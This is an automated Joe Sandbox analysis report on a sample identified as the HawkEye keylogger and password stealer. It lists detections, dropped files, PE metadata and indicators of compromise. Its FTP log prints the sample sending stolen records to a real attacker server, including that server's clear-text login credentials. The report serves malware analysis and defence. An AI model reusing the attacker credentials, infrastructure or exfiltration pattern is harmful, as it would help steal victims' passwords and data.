                  11.0.tDb0ggawON.exe.400000.6.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                  11.0.tDb0ggawON.exe.ba0000.1.unpack | 100% | Avira | HEUR/AGEN.1140941
                  11.0.tDb0ggawON.exe.ba0000.0.unpack | 100% | Avira | HEUR/AGEN.1140941
                  14.0.vbc.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1210557
                  0.2.tDb0ggawON.exe.fb0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
                  11.2.tDb0ggawON.exe.ba0000.4.unpack | 100% | Avira | HEUR/AGEN.1140941
                  Source | Detection | Scanner | Label
                  ftp.manchutimefashion.com | 0% | Virustotal |
                  168.98.4.0.in-addr.arpa | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ftp.manchutimefashion.com | 66.70.204.222 | true | true | (none) | unknown
168.98.4.0.in-addr.arpa | unknown | unknown | false | (none) | unknown
                                                                                                                                                high
                                                                                                                                                http://www.tiro.comtDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.carterandcone.com6tDb0ggawON.exe, 00000000.00000003.267830462.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269954755.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268801782.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268343485.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268234994.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.founder.ctDb0ggawON.exe, 00000000.00000003.263370600.000000000886C000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.263539092.0000000008872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.goodfont.co.krtDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.pngbhvED7C.tmp.14.drfalse
                                                                                                                                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
66.70.204.222 | ftp.manchutimefashion.com | Canada | 16276 | OVHFR | true

IP
192.168.2.1
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 571678
Start date: 14.02.2022
Start time: 09:42:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 44s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: tDb0ggawON (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@7/5@2/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 8.6% (good quality ratio 7.6%)
• Quality average: 74.8%
• Quality standard deviation: 33.6%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 152
• Number of non-executed functions: 290
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
09:43:40 | API Interceptor | 6x Sleep call for process: tDb0ggawON.exe modified
Match | Associated Sample Name / URL | Detection | Context
66.70.204.222 | Dolmas.xlsm.exe | malicious | tesla-com.tk/Awele/SINOPHIL@LOKIRAW_HGiTKz109.bin
 | eurobank.pdf.exe | malicious | tesla-com.tk/ford/SINOPHIL@LOKIRAW_GCLYOSF135.bin

Match | Associated Sample Name / URL | Detection | Context
ftp.manchutimefashion.com | 02132022769992.doc | malicious | 66.70.204.222

Match | Associated Sample Name / URL | Detection | Context
OVHFR | lsass.exe | malicious | 51.79.226.3
 | 6F2EKlap31.exe | malicious | 213.186.33.5
 | ZXAAhPUFkw.exe | malicious | 51.91.236.255
 | 02132022769992.doc | malicious | 66.70.204.222
 | XdokgkT8a7.exe | malicious | 213.186.33.5
 | esaFGnQ1rW.exe | malicious | 158.69.144.161
 | 0gnf7DCu6U.exe | malicious | 51.38.92.34
 | KTS Full.exe | malicious | 94.23.1.92
 | 8891.PDF.vbs | malicious | 198.50.177.251
 | SpaIJRDurh | malicious | 139.99.9.190
 | Remittance Advice 2994718.xlsx | malicious | 188.165.135.185
 | fdwE1cx1cL.dll | malicious | 54.38.242.185
 | Swift Copy.xlsx | malicious | 87.98.245.200
 | jung-suk.goo-2102022 84828 p.m..html | malicious | 54.39.104.158
 | gkBMCovDLy | malicious | 164.133.191.143
 | MJ8bpUoROH | malicious | 149.56.71.193
 | ZtYNQ1ZX9z | malicious | 37.187.76.126
 | adP3gvhbFy.xls | malicious | 158.69.222.101
 | CZ20sNTjue | malicious | 37.59.96.102
 | test.xls | malicious | 192.95.56.148

No context

No context
Process: C:\Users\user\Desktop\tDb0ggawON.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x00a6e44f, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 26738688
Entropy (8bit): 0.9806981969474944
Encrypted: false
SSDEEP: 24576:NNLv1SxfFUp2+se9zZi2Ou/iDyU6joEO3PX2BU:+Up2YzU2Ouv
MD5: E8B291DF74287AB07DE3B67EBE00939F
SHA1: 974061748D9603D45A1D6CDB54DCF6AC7BDBE75F
SHA-256: 18816E6459D8EF754B27400E5A344B23074A41891D0C2B73742B23FB084F3A9C
SHA-512: E9AC83D445C6287260F60F581DB1EE6DD06EB9029E35022891743ECA54027AEF8E008FDD2ED0AD7B37032C5C65AAD874AD318E2739DE700644F23186CB0B64E0
Malicious: false
Reputation: low
                                                                                                                                                  Preview:...O... .......v1.......l~.."...wK.......................m......+...z...+...z..h.o..........................k.\."...w..............................................................................................Y............B.................................................................................................................. ........+...z.......................................................................................................................................................................................................................................,'h.+...z...................-..#+...z..........................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type: Little-endian UTF-16 Unicode text, with no line terminators
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:Qn:Qn
MD5: F3B25701FE362EC84616A93A45CE9998
SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious: false
Reputation: high, very likely benign file
Preview: ..

Process: C:\Users\user\Desktop\tDb0ggawON.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 4
Entropy (8bit): 1.5
Encrypted: false
SSDEEP: 3:XU:E
MD5: 291D43C696D8C3704CDBE0A72ADE5F6C
SHA1: D7B9E40E0388ED17C5D4E9C758D1516226C03B4F
SHA-256: 1E320CF3281868C2CD0CF78C688EBDE71C6C03BC9A43D8E91CB962CCD83C2AB2
SHA-512: 55D78E26E7499EDCB2AC9619C2F84673FF83A7AFE698B31772FE665C19148876EF24DDFC88041FC3B33FB1D7ED80D395107E197B410300153854CE472E8C35A0
Malicious: false
Reputation: low
Preview: 3536

Process: C:\Users\user\Desktop\tDb0ggawON.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 38
Entropy (8bit): 4.353190671338323
Encrypted: false
SSDEEP: 3:oNUWJRWRhIC2n:oNNJAor
MD5: 6EB3124F9FDB61444C06578D83A66F24
SHA1: FC271EA7F2292C03B0855F466948BB718042AC03
SHA-256: B0AF16E4F2875581DC2360CEFE63D1AA75D533D56631BBC2A7133BE8307605F7
SHA-512: 6627BBE908A4BC6FA4F75E5F00CEB3684596416749854A21B7435A0BB711A3DBDCB783D120BC83FDAFF8708B77438793DB83E0FCE190AC4F5D5A3F5D3D3125C2
Malicious: false
Reputation: low
Preview: C:\Users\user\Desktop\tDb0ggawON.exe
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.841876304894837
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: tDb0ggawON.exe
File size: 1244160
MD5: 91de6efc69676a4dd4ced5e2111ab489
SHA1: 262f23feee502e24d6d044c05bcb7b3153b3920e
SHA256: 57754827b4e179d20088be1aa0fec9d1f8e3a872e81103b2c7264f80a0a86b36
SHA512: a138dd6d2645729104de1fd312d2240e3440706c8bb08dd127be04cb703ad1aceef69b5a26f49b4b314b63d9fa750c1ff242f3b09c80d1b9f7fb76e8f88f236f
SSDEEP: 12288:zOTIkOQC3u4diHquSEbVziIN8cmGIhUGAVigEnKQHmlNhcoHnMaTvcXw8AKT/arK:oeMxSoTSTGZihnKQHToHnHEXw8BT/
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q..b..............0.................. ... ....@.. .......................`............@................................
Icon Hash: 00828e8e8686b000
Entrypoint: 0x530ebe
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x62098671 [Sun Feb 13 22:30:09 2022 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x130e6c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x132000 | 0x658 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x134000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x12eec4 | 0x12f000 | False | 0.903467763769 | data | 7.84726885826 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x132000 | 0x658 | 0x800 | False | 0.337890625 | data | 3.51662278284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x134000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x1320a0 | 0x3cc | data | |
RT_MANIFEST | 0x13246c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright Academy of Interactive Entertainment 2017
Assembly Version | 1.0.0.0
InternalName | ResourceHelp.exe
FileVersion | 1.0.0.0
CompanyName | Academy of Interactive Entertainment
LegalTrademarks |
Comments |
ProductName | Combat Forms
ProductVersion | 1.0.0.0
FileDescription | Combat Forms
OriginalFilename | ResourceHelp.exe
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/14/22-09:44:15.960774 | TCP | 2020410 | ET TROJAN HawkEye Keylogger FTP | 49770 | 21 | 192.168.2.5 | 66.70.204.222
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 14, 2022 09:44:15.039529085 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:15.139909029 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:15.140108109 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:15.240664005 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:15.241769075 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:15.341840982 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:15.341878891 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:15.342132092 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:15.456659079 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:15.457036018 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:15.557804108 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:15.558413029 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:15.658602953 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:15.658891916 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:15.758956909 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:15.759217978 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:15.859291077 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:15.860110998 CET | 49771 | 57948 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:15.907032967 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:15.960406065 CET | 57948 | 49771 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:15.960516930 CET | 49771 | 57948 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:15.960773945 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:16.060944080 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:16.061367035 CET | 49771 | 57948 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:16.063394070 CET | 49771 | 57948 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:16.064482927 CET | 49771 | 57948 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:16.110172033 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:16.161698103 CET | 57948 | 49771 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:16.163667917 CET | 57948 | 49771 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:16.164700031 CET | 57948 | 49771 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:16.164793015 CET | 49771 | 57948 | 192.168.2.5 | 66.70.204.222
Feb 14, 2022 09:44:16.164796114 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5
Feb 14, 2022 09:44:16.219578981 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 14, 2022 09:43:52.948479891 CET | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Feb 14, 2022 09:43:52.967884064 CET | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Feb 14, 2022 09:44:14.983257055 CET | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Feb 14, 2022 09:44:15.022200108 CET | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 14, 2022 09:43:52.948479891 CET | 192.168.2.5 | 8.8.8.8 | 0xf48a | Standard query (0) | 168.98.4.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 14, 2022 09:44:14.983257055 CET | 192.168.2.5 | 8.8.8.8 | 0x19b9 | Standard query (0) | ftp.manchutimefashion.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 14, 2022 09:43:52.967884064 CET | 8.8.8.8 | 192.168.2.5 | 0xf48a | Name error (3) | 168.98.4.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 14, 2022 09:44:15.022200108 CET | 8.8.8.8 | 192.168.2.5 | 0x19b9 | No error (0) | ftp.manchutimefashion.com | | 66.70.204.222 | A (IP address) | IN (0x0001)
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Feb 14, 2022 09:44:15.240664005 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 3 of 50 allowed.
220-Local time is now 12:44. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Feb 14, 2022 09:44:15.241769075 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222 | USER Elooggs2020@manchutimefashion.com
Feb 14, 2022 09:44:15.341878891 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5 | 331 User Elooggs2020@manchutimefashion.com OK. Password required
Feb 14, 2022 09:44:15.342132092 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222 | PASS [r2W$.jaD*?p
Feb 14, 2022 09:44:15.456659079 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5 | 230 OK. Current restricted directory is /
Feb 14, 2022 09:44:15.557804108 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5 | 504 Unknown command
Feb 14, 2022 09:44:15.558413029 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222 | PWD
Feb 14, 2022 09:44:15.658602953 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5 | 257 "/" is your current location
Feb 14, 2022 09:44:15.658891916 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222 | TYPE I
Feb 14, 2022 09:44:15.758956909 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5 | 200 TYPE is now 8-bit binary
Feb 14, 2022 09:44:15.759217978 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222 | PASV
Feb 14, 2022 09:44:15.859291077 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5 | 227 Entering Passive Mode (66,70,204,222,226,92)
Feb 14, 2022 09:44:15.960773945 CET | 49770 | 21 | 192.168.2.5 | 66.70.204.222 | STOR HawkEye_Keylogger_Stealer_Records_287400 2.14.2022 9:51:52 AM.txt
Feb 14, 2022 09:44:16.060944080 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5 | 150 Accepted data connection
Feb 14, 2022 09:44:16.164796114 CET | 21 | 49770 | 66.70.204.222 | 192.168.2.5 | 226-File successfully transferred
226 0.104 seconds (measured here), 14.36 Kbytes per second
Target ID: 0
Start time: 09:43:20
Start date: 14/02/2022
Path: C:\Users\user\Desktop\tDb0ggawON.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\tDb0ggawON.exe"
Imagebase: 0xfb0000
File size: 1244160 bytes
MD5 hash: 91DE6EFC69676A4DD4CED5E2111AB489
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

Target ID: 11
Start time: 09:43:42
Start date: 14/02/2022
Path: C:\Users\user\Desktop\tDb0ggawON.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\tDb0ggawON.exe
Imagebase: 0xba0000
File size: 1244160 bytes
MD5 hash: 91DE6EFC69676A4DD4CED5E2111AB489
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000B.00000002.520798219.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
• Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000B.00000002.520764467.0000000008080000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
